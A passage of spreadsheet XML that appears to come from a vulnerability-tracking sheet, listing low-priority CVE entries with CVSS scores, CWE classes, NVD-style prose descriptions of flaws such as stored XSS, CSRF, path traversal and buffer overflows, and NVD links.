      <c r="D5526" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5526" s="5" t="inlineStr"/>
      <c r="F5526" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5526" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5526" s="5" t="inlineStr"/>
      <c r="I5526" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5526" s="5" t="inlineStr"/>
      <c r="K5526" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5526" s="5" t="inlineStr">
        <is>
          <t>Worksuite SaaS versions prior to 6.0.14 contains a stored cross-site scripting vulnerability in the Asset Management module that allows authenticated administrators to inject arbitrary JavaScript by entering malicious payloads into the Location and Description fields when creating a new asset. Attackers can store crafted HTML script tags in the application database that execute automatically in the browsers of any user who views the affected asset, potentially leading to session hijacking, credential theft, and unauthorized actions on behalf of authenticated users.</t>
        </is>
      </c>
      <c r="M5526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18741</t>
        </is>
      </c>
    </row>
    <row r="5527">
      <c r="A5527" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21097</t>
        </is>
      </c>
      <c r="C5527" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5527" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5527" s="5" t="inlineStr"/>
      <c r="F5527" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5527" s="5" t="inlineStr"/>
      <c r="H5527" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I5527" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5527" s="5" t="inlineStr"/>
      <c r="K5527" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L5527" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in ActivityTaskManagerService prior to SMR Sep-2026 Release 1 allows local privileged attackers to launch arbitrary activity.</t>
        </is>
      </c>
      <c r="M5527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21097</t>
        </is>
      </c>
    </row>
    <row r="5528">
      <c r="A5528" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44401</t>
        </is>
      </c>
      <c r="C5528" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5528" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5528" s="5" t="inlineStr"/>
      <c r="F5528" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5528" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5528" s="5" t="inlineStr"/>
      <c r="I5528" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5528" s="5" t="inlineStr"/>
      <c r="K5528" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5528" s="5" t="inlineStr">
        <is>
          <t>Typemill CMS version 2.x contains a persistent cross-site scripting vulnerability in the Markdown parser extension that allows authenticated users with theme-configuration access to inject malicious JavaScript URIs by supplying unsanitized href values in Markdown links. Attackers can craft Markdown links using the javascript: scheme through ParsedownExtension.php or TwigMarkdownExtension.php, storing a persistent payload that executes in the browser of every visitor who clicks the link, enabling session cookie theft, authenticated request forgery, and credential harvesting.</t>
        </is>
      </c>
      <c r="M5528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44401</t>
        </is>
      </c>
    </row>
    <row r="5529">
      <c r="A5529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45119</t>
        </is>
      </c>
      <c r="C5529" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5529" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5529" s="5" t="inlineStr"/>
      <c r="F5529" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5529" s="5" t="inlineStr"/>
      <c r="H5529" s="5" t="inlineStr"/>
      <c r="I5529" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5529" s="5" t="inlineStr"/>
      <c r="K5529" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5529" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Admin CP UTF-8 Conversion module does not validate certain requests correctly, allowing same-site attackers to alter table encoding and deny service with a specially crafted URL. The do=all control flow in admin/modules/tools/system_health.php performs ALTER TABLE operations, column rewrite phases, and fulltext index rebuilds on GET requests for the database table named by the table parameter without request verification. The uniquely identifying implementation details include GET requests without request verification. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45119</t>
        </is>
      </c>
    </row>
    <row r="5530">
      <c r="A5530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45129</t>
        </is>
      </c>
      <c r="C5530" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5530" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5530" s="5" t="inlineStr"/>
      <c r="F5530" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5530" s="5" t="inlineStr"/>
      <c r="H5530" s="5" t="inlineStr"/>
      <c r="I5530" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5530" s="5" t="inlineStr"/>
      <c r="K5530" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5530" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Admin CP Recovery Codes module does not validate requests correctly, allowing same-site attackers to rotate a victim administrator's recovery codes with a specially crafted URL. The Admin CP Home, Preferences, Recovery Codes action=recovery_codes page regenerates Two-Factor Authentication recovery codes in mybb_adminoptions.recovery_codes on GET requests without request forgery protection. The uniquely identifying implementation details include admin/modules/home/preferences.php. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45129</t>
        </is>
      </c>
    </row>
    <row r="5531">
      <c r="A5531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49836</t>
        </is>
      </c>
      <c r="C5531" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5531" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5531" s="5" t="inlineStr"/>
      <c r="F5531" s="5" t="inlineStr"/>
      <c r="G5531" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5531" s="5" t="inlineStr"/>
      <c r="I5531" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5531" s="5" t="inlineStr"/>
      <c r="K5531" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L5531" s="5" t="inlineStr">
        <is>
          <t>psd-tools is a Python package for working with Adobe Photoshop PSD files. Prior to version 1.17.1, `SmartObject.save()` writes an embedded smart object to a path taken verbatim from the PSD file. Because that name is attacker-controlled and unsanitised, a tool that extracts embedded objects from an untrusted `.psd` can be made to write attacker-chosen bytes to an attacker-chosen path (absolute or `../`-traversing), outside its intended output directory. A secondary issue in `SmartObject.open()` for external-kind smart objects allows the attacker-controlled `fullPath` descriptor to be used as an arbitrary file read path, enabling exfiltration of the read content to the controlled write destination. Both issues are fixed in v1.17.1.</t>
        </is>
      </c>
      <c r="M5531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49836</t>
        </is>
      </c>
    </row>
    <row r="5532">
      <c r="A5532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53468</t>
        </is>
      </c>
      <c r="C5532" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5532" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5532" s="5" t="inlineStr"/>
      <c r="F5532" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5532" s="5" t="inlineStr"/>
      <c r="H5532" s="5" t="inlineStr"/>
      <c r="I5532" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J5532" s="5" t="inlineStr"/>
      <c r="K5532" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5532" s="5" t="inlineStr">
        <is>
          <t>Typemill is a flat-file, Markdown-based content management system designed for informational documentation websites. Versions prior to 2.23.0 are vulnerable to stored HTML attribute injection in the page metadata fields (`og:title` and `og:description`). An authenticated user with permission to modify page metadata can inject arbitrary HTML attributes into generated `&lt;meta&gt;` tags due to missing output encoding. Under certain browser or DOM interaction scenarios, this may lead to stored cross-site scripting (XSS). Version 2.23.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M5532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53468</t>
        </is>
      </c>
    </row>
    <row r="5533">
      <c r="A5533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61607</t>
        </is>
      </c>
      <c r="C5533" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5533" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5533" s="5" t="inlineStr"/>
      <c r="F5533" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5533" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5533" s="5" t="inlineStr"/>
      <c r="I5533" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5533" s="5" t="inlineStr"/>
      <c r="K5533" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5533" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.2, the Grav API plugin POST /api/v1/media pipeline in HandlesMediaUploads::processUploadedFile() validates an SVG filename extension but does not invoke Security::sanitizeSVG(). An attacker with api.media.write permission can store an SVG containing JavaScript, and the server returns the file as Content-Type: image/svg+xml so the script executes when a victim opens it, allowing session data theft and authenticated actions. This issue is fixed in version 1.0.2.</t>
        </is>
      </c>
      <c r="M5533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61607</t>
        </is>
      </c>
    </row>
    <row r="5534">
      <c r="A5534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67673</t>
        </is>
      </c>
      <c r="C5534" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5534" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5534" s="5" t="inlineStr"/>
      <c r="F5534" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5534" s="5" t="inlineStr"/>
      <c r="H5534" s="5" t="inlineStr"/>
      <c r="I5534" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J5534" s="5" t="inlineStr"/>
      <c r="K5534" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L5534" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the cmd_edl function of OreSat Firmware v1.0. The vulnerability is triggered when processing the edl fw_flash command, where the &lt;filename&gt; argument is copied to a 64-byte stack buffer via memcpy without proper length validation. An attacker with physical access to the UART3 serial interface can exploit this vulnerability by sending a maliciously crafted command with an oversized filename parameter,</t>
        </is>
      </c>
      <c r="M5534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67673</t>
        </is>
      </c>
    </row>
    <row r="5535">
      <c r="A5535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69381</t>
        </is>
      </c>
      <c r="C5535" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5535" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5535" s="5" t="inlineStr"/>
      <c r="F5535" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5535" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5535" s="5" t="inlineStr"/>
      <c r="I5535" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5535" s="5" t="inlineStr"/>
      <c r="K5535" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5535" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Storage Port Driver allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M5535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69381</t>
        </is>
      </c>
    </row>
    <row r="5536">
      <c r="A5536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69548</t>
        </is>
      </c>
      <c r="C5536" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5536" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5536" s="5" t="inlineStr"/>
      <c r="F5536" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5536" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5536" s="5" t="inlineStr"/>
      <c r="I5536" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5536" s="5" t="inlineStr"/>
      <c r="K5536" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L5536" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M5536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t>
        </is>
      </c>
    </row>
    <row r="5537">
      <c r="A5537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73075</t>
        </is>
      </c>
      <c r="C5537" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5537" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5537" s="5" t="inlineStr"/>
      <c r="F5537" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5537" s="5" t="inlineStr"/>
      <c r="H5537" s="5" t="inlineStr"/>
      <c r="I5537" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5537" s="5" t="inlineStr"/>
      <c r="K5537" s="5" t="inlineStr">
        <is>
          <t>CWE-124, CWE-125</t>
        </is>
      </c>
      <c r="L5537" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. From 9.2.0469 until 9.2.0843, popup_mark_opacity_zindex() in src/popupwin.c can use a negative w_winrow for a text-property-anchored popup with clipwindow and opacity, indexing before the screen array instead of accounting for w_popup_topoff and causing an out-of-bounds read and conditional write. This issue is fixed in version 9.2.0843.</t>
        </is>
      </c>
      <c r="M5537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73075</t>
        </is>
      </c>
    </row>
    <row r="5538">
      <c r="A5538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76959</t>
        </is>
      </c>
      <c r="C5538" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5538" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5538" s="5" t="inlineStr"/>
      <c r="F5538" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5538" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5538" s="5" t="inlineStr"/>
      <c r="I5538" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5538" s="5" t="inlineStr"/>
      <c r="K5538" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5538"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M5538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76959</t>
        </is>
      </c>
    </row>
    <row r="5539">
      <c r="A5539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77353</t>
        </is>
      </c>
      <c r="C5539" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5539" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5539" s="5" t="inlineStr"/>
      <c r="F5539" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5539" s="5" t="inlineStr"/>
      <c r="H5539" s="5" t="inlineStr"/>
      <c r="I5539" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5539" s="5" t="inlineStr"/>
      <c r="K5539" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-74</t>
        </is>
      </c>
      <c r="L5539" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 5.0.0, Wallos allows authenticated users to inject arbitrary iCalendar properties and events into their exported .ics feed by embedding raw CRLF sequences in subscription names or notes. Because the input validation layer only encodes HTML metacharacters but never strips newlines, and the export layer decodes those entities back before writing iCal output, an attacker with any valid account can craft a subscription whose name breaks out of the current VEVENT block and inserts fully attacker-controlled calendar events — including spoofed organizers, arbitrary email addresses in ATTENDEE properties, and misleading event content — into any calendar application subscribed to that feed. This issue has been patched in version 5.0.0.</t>
        </is>
      </c>
      <c r="M5539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77353</t>
        </is>
      </c>
    </row>
    <row r="5540">
      <c r="A5540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78452</t>
        </is>
      </c>
      <c r="C5540" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5540" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5540" s="5" t="inlineStr"/>
      <c r="F5540" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5540" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H5540" s="5" t="inlineStr"/>
      <c r="I5540" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5540" s="5" t="inlineStr"/>
      <c r="K5540" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5540" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M5540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t>
        </is>
      </c>
    </row>
    <row r="5541">
      <c r="A5541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78508</t>
        </is>
      </c>
      <c r="C5541" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5541" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5541" s="5" t="inlineStr"/>
      <c r="F5541" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5541" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H554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541" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5541" s="5" t="inlineStr"/>
      <c r="K5541" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5541" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M5541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78508</t>
        </is>
      </c>
    </row>
    <row r="5542">
      <c r="A5542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86484</t>
        </is>
      </c>
      <c r="C5542" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5542" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5542" s="5" t="inlineStr"/>
      <c r="F5542" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5542" s="5" t="inlineStr"/>
      <c r="H5542" s="5" t="inlineStr"/>
      <c r="I5542" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5542" s="5" t="inlineStr"/>
      <c r="K5542" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5542" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 angularJS template injection in assignee names led to stored XSS</t>
        </is>
      </c>
      <c r="M5542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86484</t>
        </is>
      </c>
    </row>
    <row r="5543">
      <c r="A5543" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86776</t>
        </is>
      </c>
      <c r="C5543" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5543" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5543" s="5" t="inlineStr"/>
      <c r="F5543" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5543" s="5" t="inlineStr"/>
      <c r="H5543" s="5" t="inlineStr"/>
      <c r="I5543" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5543" s="5" t="inlineStr"/>
      <c r="K5543" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="L5543" s="5" t="inlineStr">
        <is>
          <t>KeePass versions 2.35 through 2.61.1 fail to validate KDBX header field sizes before memory allocation in the ReadHeaderField function. Attackers can craft a malicious KDBX file declaring excessive header field lengths to trigger allocation of gigabytes of memory, causing the application to consume resources and terminate.</t>
        </is>
      </c>
      <c r="M5543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86776</t>
        </is>
      </c>
    </row>
    <row r="5544">
      <c r="A5544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9852</t>
        </is>
      </c>
      <c r="C5544" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5544" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5544" s="5" t="inlineStr"/>
      <c r="F5544" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5544" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5544" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="I5544" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5544" s="5" t="inlineStr"/>
      <c r="K5544" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L5544" s="5" t="inlineStr">
        <is>
          <t>A CSV injection vulnerability exists in SYS600. Injected malicious formulas can add or modify data to the spreadsheet, insert links, exfiltrate data, and in some cases, depending on how the user has their environment configured, execute malicious code on the user’s machine. To exploit this issue attackers would need a way to create arbitrary log messages. This could be achieved through normal functionality via SCIL scripts, a log injection vulnerability, or via the SYS600 broker. This vulnerability affects all Windows users regardless of their privilege level who can run the Notify service and export the log.</t>
        </is>
      </c>
      <c r="M5544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9852</t>
        </is>
      </c>
    </row>
    <row r="5545">
      <c r="A5545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0296</t>
        </is>
      </c>
      <c r="C5545" s="5" t="n">
        <v>4.5</v>
      </c>
      <c r="D5545" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5545" s="5" t="inlineStr"/>
      <c r="F5545" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5545" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H5545" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:globalprotect</t>
        </is>
      </c>
      <c r="I5545" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5545" s="5" t="inlineStr"/>
      <c r="K5545" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L5545" s="5" t="inlineStr">
        <is>
          <t>Improper certificate validation vulnerabilities in Palo Alto Networks GlobalProtect™ app enable an unauthenticated attacker with man-in-the-middle (MitM) access to intercept and modify application communications. VPN tunnel traffic is not impacted.
The GlobalProtect app on iOS, Android, and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M5545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0296</t>
        </is>
      </c>
    </row>
    <row r="5546">
      <c r="A5546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5546" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-5278</t>
        </is>
      </c>
      <c r="C5546" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5546" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5546" s="5" t="inlineStr"/>
      <c r="F5546" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5546" s="5" t="inlineStr"/>
      <c r="H5546" s="5" t="inlineStr"/>
      <c r="I5546" s="5" t="inlineStr">
        <is>
          <t>2025-05-27</t>
        </is>
      </c>
      <c r="J5546" s="5" t="inlineStr"/>
      <c r="K5546" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L5546" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GNU Coreutils. The sort utility's begfield() function is vulnerable to a heap buffer under-read. The program may access memory outside the allocated buffer if a user runs a crafted command using the traditional key format. A malicious input could lead to a crash or leak sensitive data.</t>
        </is>
      </c>
      <c r="M5546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-5278</t>
        </is>
      </c>
    </row>
    <row r="5547">
      <c r="A5547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0001</t>
        </is>
      </c>
      <c r="C5547" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5547" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5547" s="5" t="inlineStr"/>
      <c r="F5547" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5547" s="5" t="inlineStr"/>
      <c r="H5547" s="5" t="inlineStr"/>
      <c r="I5547" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
